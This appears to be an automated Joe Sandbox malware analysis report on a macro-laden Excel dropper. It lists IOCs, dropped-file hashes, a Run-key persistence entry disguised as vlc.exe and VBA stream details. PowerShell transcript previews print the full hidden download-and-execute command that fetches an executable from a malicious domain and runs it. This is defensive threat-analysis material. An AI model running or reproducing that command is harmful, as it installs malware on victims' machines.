                                              Joe Sandbox Version:31.0.0 Red Diamond
                                              Analysis ID:323692
                                              Start date:27.11.2020
                                              Start time:11:35:45
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 13m 38s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:5901777.xls
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Run name:Potential for more IOCs and behavior
                                              Number of analysed new started processes analysed:33
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winXLS@16/12@2/1
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 3.9% (good quality ratio 3.8%)
                                              • Quality average: 78.1%
                                              • Quality standard deviation: 26%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .xls
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • TCP Packets have been reduced to 100
                                              • Excluded IPs from analysis (whitelisted): 40.88.32.150, 52.147.198.201, 52.109.76.68, 52.109.8.24, 51.11.168.160, 104.42.151.234, 95.101.184.67, 20.54.26.129, 2.20.142.209, 2.20.142.210, 92.122.213.194, 92.122.213.247
                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

Time      Type              Description
11:38:01  API Interceptor   367x Sleep call for process: splwow64.exe modified
11:38:06  API Interceptor   77x Sleep call for process: powershell.exe modified
11:38:30  Autostart         Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run vlc "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe"
11:38:39  Autostart         Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run vlc "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe"

                                              Joe Sandbox View / Context

                                              IPs

Match            Associated Sample Name / URL                        Detection   Context
162.223.88.131   Hm0L8.xls                                           malicious   sparepartiran.com/js/2Q/Mvyfnzkjh1.exe
                 5080132.xls                                         malicious   sparepartiran.com/js/1Q/Lfswmnuywzkn9.exe
                 Ref 0047.xls                                        malicious   sparepartiran.com/js/2Q/Yvvtz1.exe
                 633307.xls                                          malicious   sparepartiran.com/js/2Q/Wzdgpx2.exe
                 SecuriteInfo.com.Exploit.Siggen3.1570.13842.xls     malicious   sparepartiran.com/js/2Q/Twvaedwzfyck1.exe
                 4640578.xls                                         malicious   sparepartiran.com/js/2Q/Bolgkwpzwqs8.exe
                 6021557.xls                                         malicious   sparepartiran.com/js/d1/8YAOuE8zfTpo1M9.exe
                 INQUIRY ON PRICE LIST.xlsm                          malicious   sparepartiran.com/js/d1/IT4l74TKgSA7p92.exe
                 ORDER-45103.xls                                     malicious   sparepartiran.com/js/d1/SDJ-0488.exe
                 yp7kw0211047.xls                                    malicious   sparepartiran.com/js/d1/411.exe
                 Debt Statement.xls                                  malicious   sparepartiran.com/js/s0/11056.jpg
                 SD-1061.xls                                         malicious   sparepartiran.com/js/s0/SD-1061.jpg
                 NEW ORDER.xls                                       malicious   sparepartiran.com/js/s0/zz1ecco.jpg

                                              Domains

Match                Associated Sample Name / URL                        Detection   Context
sparepartiran.com    Hm0L8.xls                                           malicious   162.223.88.131
                     5080132.xls                                         malicious   162.223.88.131
                     Ref 0047.xls                                        malicious   162.223.88.131
                     633307.xls                                          malicious   162.223.88.131
                     SecuriteInfo.com.Exploit.Siggen3.1570.13842.xls     malicious   162.223.88.131
                     4640578.xls                                         malicious   162.223.88.131
                     6021557.xls                                         malicious   162.223.88.131
                     INQUIRY ON PRICE LIST.xlsm                          malicious   162.223.88.131
                     ORDER-45103.xls                                     malicious   162.223.88.131
                     yp7kw0211047.xls                                    malicious   162.223.88.131
                     Debt Statement.xls                                  malicious   162.223.88.131
                     SD-1061.xls                                         malicious   162.223.88.131
                     NEW ORDER.xls                                       malicious   162.223.88.131

                                              ASN

Match        Associated Sample Name / URL                        Detection   Context
COLOUPUS     Hm0L8.xls                                           malicious   162.223.88.131
             5080132.xls                                         malicious   162.223.88.131
             Ref 0047.xls                                        malicious   162.223.88.131
             633307.xls                                          malicious   162.223.88.131
             SecuriteInfo.com.Exploit.Siggen3.1570.13842.xls     malicious   162.223.88.131
             4640578.xls                                         malicious   162.223.88.131
             6021557.xls                                         malicious   162.223.88.131
             INQUIRY ON PRICE LIST.xlsm                          malicious   162.223.88.131
             ORDER-45103.xls                                     malicious   162.223.88.131
             yp7kw0211047.xls                                    malicious   162.223.88.131
             Debt Statement.xls                                  malicious   162.223.88.131
             SD-1061.xls                                         malicious   162.223.88.131
             NEW ORDER.xls                                       malicious   162.223.88.131

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\Public\oftmhayq.exe
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):552960
                                              Entropy (8bit):7.182147023805618
                                              Encrypted:false
                                              SSDEEP:12288:MiUO3Iy0AZNVNpiWbYOoa09FQFFFFFFFFFFFFFFFFFFFFFRYH8txxxxxxxxxxxxZ:InULziIYpaIFq
                                              MD5:7E26E87AB642008D934824D509559859
                                              SHA1:3D4DC73FEE1B191C2B942E28920C37C82D38B0ED
                                              SHA-256:3176528C561817095AF859F4809A2091F8557F93C27A0FE32EE71C8FC3B71F33
                                              SHA-512:C51D64487F852B3D24C4F6B6C2EB79DEAC9394A607BE1B8287BD087398B17B5403DDACE34EB46FD0A5807E044ECC6869213CCEF9EEDA4604D7A1DF711B691A2C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_.................P..........No... ........@.. ....................................@..................................n..W.................................................................................... ............... ..H............text...TO... ...P.................. ..`.rsrc................R..............@..@.reloc...............n..............@..B................0o......H........J..h$...........0...............................................0.............-.&(....+.&+.*....0..3........(......-.&..-.&..-.&.(....+.(....+.(....+.(....+.*..0.......... .....-.&s.....-.&sX....-.&.o....+..+..+...+..(.....o.....j2...+...(....r...p..H...........(......(.......*........o[.....o....t+...}....*...0.. .........{....r...po.....-.&&+.}....+.*.0..u........{....(.....-.&~....-I+..+. ....r_..p......(...........-.&....(......(....( ....-.&+..+.....+.~....{!..
                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\oftmhayq.exe.log
                                              Process:C:\Users\Public\oftmhayq.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1391
                                              Entropy (8bit):5.344111348947579
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4xLE4qE4W:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzh
                                              MD5:E87C60A24438CC611338EA5ACB433A0A
                                              SHA1:E0C6A7D5CFE32BB2178E71DEE79971A51697B7DD
                                              SHA-256:80DAB47D7A9E233A692D10ACAF5793E34911836D36DB2E11BB7C5D42DE39782A
                                              SHA-512:3DBD6773153DC9D05558ED491A92C9B4B72D594263D7BD2D06BDDCF09BE55477D35041145219A5E9A46B38575E5B60DA91C6870B2CA29A83388695AD389B8EBF
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\AC884895-1FFB-4FFD-9AEA-0EAADDCF8F32
                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):129952
                                              Entropy (8bit):5.378326234389065
                                              Encrypted:false
                                              SSDEEP:1536:mcQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:0mQ9DQW+zBX8u
                                              MD5:DF0C880894C2F78E9AD029585FF4FCA7
                                              SHA1:77216174BF47B52075FDB840151377A6682CD90E
                                              SHA-256:284F18BFBB35013569813423ECE460368B4AE64FD5631B444BB8B82F7FC72BD8
                                              SHA-512:2058245A6AFF413CC97265F041A3690D5CE19F3522320ECD468602CA5BC35393AEE9C925065111629180275581B808B63D7D3B42207DDE95F2A98BF1924D16E0
                                              Malicious:false
                                              Reputation:low
                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-27T10:36:40">.. Build: 16.0.13518.30530-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):0.9260988789684415
                                              Encrypted:false
                                              SSDEEP:3:Nlllulb/lj:NllUb/l
                                              MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                              SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                              SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                              SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview: @...e................................................@..........
                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cgkruib0.ygj.psm1
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview: 1
                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eynwfcx2.3ju.psm1
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview: 1
                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ljxb34qx.vzy.ps1
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview: 1
                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ryxuahqv.3dg.ps1
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview: 1
                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
                                              Process:C:\Users\Public\oftmhayq.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):552960
                                              Entropy (8bit):7.182147023805618
                                              Encrypted:false
                                              SSDEEP:12288:MiUO3Iy0AZNVNpiWbYOoa09FQFFFFFFFFFFFFFFFFFFFFFRYH8txxxxxxxxxxxxZ:InULziIYpaIFq
                                              MD5:7E26E87AB642008D934824D509559859
                                              SHA1:3D4DC73FEE1B191C2B942E28920C37C82D38B0ED
                                              SHA-256:3176528C561817095AF859F4809A2091F8557F93C27A0FE32EE71C8FC3B71F33
                                              SHA-512:C51D64487F852B3D24C4F6B6C2EB79DEAC9394A607BE1B8287BD087398B17B5403DDACE34EB46FD0A5807E044ECC6869213CCEF9EEDA4604D7A1DF711B691A2C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_.................P..........No... ........@.. ....................................@..................................n..W.................................................................................... ............... ..H............text...TO... ...P.................. ..`.rsrc................R..............@..@.reloc...............n..............@..B................0o......H........J..h$...........0...............................................0.............-.&(....+.&+.*....0..3........(......-.&..-.&..-.&.(....+.(....+.(....+.(....+.*..0.......... .....-.&s.....-.&sX....-.&.o....+..+..+...+..(.....o.....j2...+...(....r...p..H...........(......(.......*........o[.....o....t+...}....*...0.. .........{....r...po.....-.&&+.}....+.*.0..u........{....(.....-.&~....-I+..+. ....r_..p......(...........-.&....(......(....( ....-.&+..+.....+.~....{!..
                                              C:\Users\user\Documents\20201127\PowerShell_transcript.849224.0kLC5vT1.20201127113806.txt
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):3951
                                              Entropy (8bit):5.421598276555511
                                              Encrypted:false
                                              SSDEEP:96:BZIh5N9I1qDo1ZrSieXmZah5N9I1qDo1ZIseX2eXSrEzyeXSrEzyeXSrEzTZ7:leXgeX2eX8eX8eXn
                                              MD5:5157FE1088C77BC92F20BF23DB040ACB
                                              SHA1:108D7C64C82A178B2E12F50983FC746C8C008621
                                              SHA-256:DE128F5C758AE0CDE62A7074EBBBECFE96BACA2D30503A2CF49B54CD6D026309
                                              SHA-512:91BD8AC33B8459D11CDBB63EA7F4083395EE152671CA459B58560D2AE4ABDA4D4AC8752D64EDB05FC05F69C9F36153B5DCB0AEDC2A87ECEF04F615C3028F40C8
                                              Malicious:false
                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20201127113806..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 849224 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath C:\Users\Public\oftmhayq.exe}..Process ID: 5184..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201127113806..**********************..PS> & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath C:\Users\Public\oftmhayq.
                                              C:\Users\user\Documents\20201127\PowerShell_transcript.849224.b3BihSD7.20201127113805.txt
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1219
                                              Entropy (8bit):5.282450136999881
                                              Encrypted:false
                                              SSDEEP:24:BxSAsxvBn5x2DOXiRbWoPuv18WMHjeTKKjX4CIym1ZJXQaPuv1WnxSAZI:BZwvh5oOqioPuv1HMqDYB1ZLPuv14ZZI
                                              MD5:09AC619D5065DA9F92352D74207C3020
                                              SHA1:FAF52D46822C6571C60E32E0C79D1D6947BCA100
                                              SHA-256:7567B37EB56FECE10EC3C5924D2EF4576ABF88080D9C09439B44104FBB182E5B
                                              SHA-512:FB281DD2CA0977C9B659171CE9DC89A957F098AF7D3A8537A1C54D30F94448609C2319D9BE6A1FEA042417CE15CA0FE4D3E286C1FC0CF0CC9FAAFEF41F95E54E
                                              Malicious:false
                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20201127113806..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 849224 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath C:\Users\Public\oftmhayq.exe}..Process ID: 5164..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201127113806..**********************..PS> & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath C:\Users\Public\oftmhayq.

                                              Static File Info

                                              General

                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Dell, Last Saved By: Dell, Create Time/Date: Fri Nov 27 09:06:11 2020, Last Saved Time/Date: Fri Nov 27 09:06:12 2020, Security: 0
                                              Entropy (8bit):7.862065005946057
                                              TrID:
                                              • Microsoft Excel sheet (30009/1) 47.99%
                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                              File name:5901777.xls
                                              File size:208384
                                              MD5:899e5af08f0794f0131adbf03f841045
                                              SHA1:242508434986d472b0b83387ec8d5d33888baa29
                                              SHA256:74b115a8b1f4e18d26b092dc965b60ad94dba931591d9913db219823d294904a
                                              SHA512:e43293d7d37a19a7564e076fdb55ea9594758246504cbd504653f8b3c60a94806313145c13366f21bcc85b98c407262f63bfdb25511738899fcef4cb4cf665a2
                                              SSDEEP:6144:gk3hOdsylKlgryzc4bNhZF+E+W2knu17K4g62FpqDIWPIVirJNl15bdVwHmGRl:61+4v2FpqDAcrJN1bbwGGR
                                              File Content Preview:........................>.......................................................b.......d......................................................................................................................................................................

                                              File Icon

                                              Icon Hash:74ecd4c6c3c6c4d8

                                              Static OLE Info

                                              General

                                              Document Type:OLE
                                              Number of OLE Files:1

                                              OLE File "5901777.xls"

                                              Indicators

                                              Has Summary Info:True
                                              Application Name:unknown
                                              Encrypted Document:False
                                              Contains Word Document Stream:False
                                              Contains Workbook/Book Stream:True
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:
                                              Flash Objects Count:
                                              Contains VBA Macros:True

                                              Summary

                                              Code Page:1252
                                              Author:Dell
                                              Last Saved By:Dell
                                              Create Time:2020-11-27 09:06:11
                                              Last Saved Time:2020-11-27 09:06:12
                                              Security:0

                                              Document Summary

                                              Document Code Page:1252
                                              Thumbnail Scaling Desired:False
                                              Contains Dirty Links:False
                                              Shared Document:False
                                              Changed Hyperlinks:False
                                              Application Version:983040

                                              Streams with VBA

                                              VBA File Name: ThisWorkbook.cls, Stream Size: 742
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                              VBA File Name:ThisWorkbook.cls
                                              Stream Size:742
                                              Data ASCII:. . . . A t t r i b u t . e V B _ N a m . e = " T h i . s W o r k b o o . k " . . . . B a s . . . 0 { 0 0 0 2 0 P 8 1 9 - . . 0 . . C # . . . . 4 6 } . | G l . o b a l . . S p a . c . . F a l s e . % . C r e a t a b l . . . P r e d e c l . a . . I d . # T r u . . " E x p o s e . . . . @ T e m p l a t @ e D e r i v . . C . u s t o m i z . D . . 2 P . . . . S u b . . . _ B e f o r . e C l . 9 ( C a n . c e l A s B . o o l e a n ) . . . R a n g e ( " . l 1 : x 2 2 " ) . . S e l e c t . . . . . i
                                              Data Raw:01 e2 b2 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 57 6f 72 6b 62 6f 6f 10 6b 22 0d 0a 0a 8c 42 61 73 01 02 8c 30 7b 30 30 30 32 30 50 38 31 39 2d 00 10 30 03 08 43 23 05 12 03 00 34 36 7d 0d 7c 47 6c 10 6f 62 61 6c 01 d0 53 70 61 82 63 01 92 46 61 6c 73 65 0c 25 00 43 72 65 61 74 61 62 6c 01 15 1f 50 72 65 64 65 63 6c 12 61 00 06 49 64

                                              VBA Code Keywords

                                              Keyword
                                              .ShrinkToFit
                                              .TintAndShade
                                              lctheufps
                                              VB_Name
                                              VB_Creatable
                                              xlCenter
                                              lctheufps.Create(yqukhazhshmodqbmnkwuescdsportzmbady)
                                              "ThisWorkbook"
                                              VB_Exposed
                                              .VerticalAlignment
                                              .WrapText
                                              .Orientation
                                              Selection.Borders(xlDiagonalUp).LineStyle
                                              .MergeCells
                                              xlThin
                                              psisbdmpm
                                              Workbook_BeforeClose(Cancel
                                              VB_Customizable
                                              .ColorIndex
                                              .AddIndent
                                              Selection.Font.Italic
                                              .Weight
                                              Selection.Font.Bold
                                              xlContext
                                              yqukhazhshmodqbmnkwuescdsportzmbady
                                              .HorizontalAlignment
                                              xlBottom
                                              .LineStyle
                                              VB_TemplateDerived
                                              xlNone
                                              xlUnderlineStyleSingle
                                              Selection.Borders(xlDiagonalDown).LineStyle
                                              Selection.Borders(xlEdgeTop)
                                              Selection
                                              False
                                              Selection.Borders(xlEdgeLeft)
                                              .IndentLevel
                                              Attribute
                                              Selection.Font.Underline
                                              Private
                                              .ReadingOrder
                                              xlContinuous
                                              VB_PredeclaredId
                                              VB_GlobalNameSpace
                                              VB_Base
                                              Boolean)
                                              VBA Code
                                              VBA File Name: oldgcaiba.cls, Stream Size: 172
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/oldgcaiba
                                              VBA File Name:oldgcaiba.cls
                                              Stream Size:172
                                              Data ASCII:. . . . A t t r i b u t . e V B _ N a m . e = " o l d . g c a i b a " . " . . . B a s . . 0 { . 0 0 0 2 0 8 2 0 6 - . . . . C . . . . 4 6 . } . | G l o b a l ! . . S p a c . . F a . l s e . % C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . . @ T e m . p l a t e D e r . i v . . C u s t o . m i z . D . 2
                                              Data Raw:01 a8 b0 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 6f 6c 64 00 67 63 61 69 62 61 22 0d 22 0a 0a 80 42 61 73 02 80 30 7b 00 30 30 30 32 30 38 32 30 36 2d 00 10 04 08 43 05 12 03 00 34 36 02 7d 0d 7c 47 6c 6f 62 61 6c 21 01 ca 53 70 61 63 01 92 46 61 08 6c 73 65 0c 25 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72

                                              VBA Code Keywords

                                              Keyword
                                              "oldgcaiba"
                                              False
                                              VB_Exposed
                                              Attribute
                                              VB_Name
                                              VB_Creatable
                                              VB_PredeclaredId
                                              VB_GlobalNameSpace
                                              VB_Base
                                              VB_Customizable
                                              VB_TemplateDerived
                                              VBA Code

                                              Streams

                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 107
                                              General
                                              Stream Path:\x1CompObj
                                              File Type:data
                                              Stream Size:107
                                              Entropy:4.18482950044
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
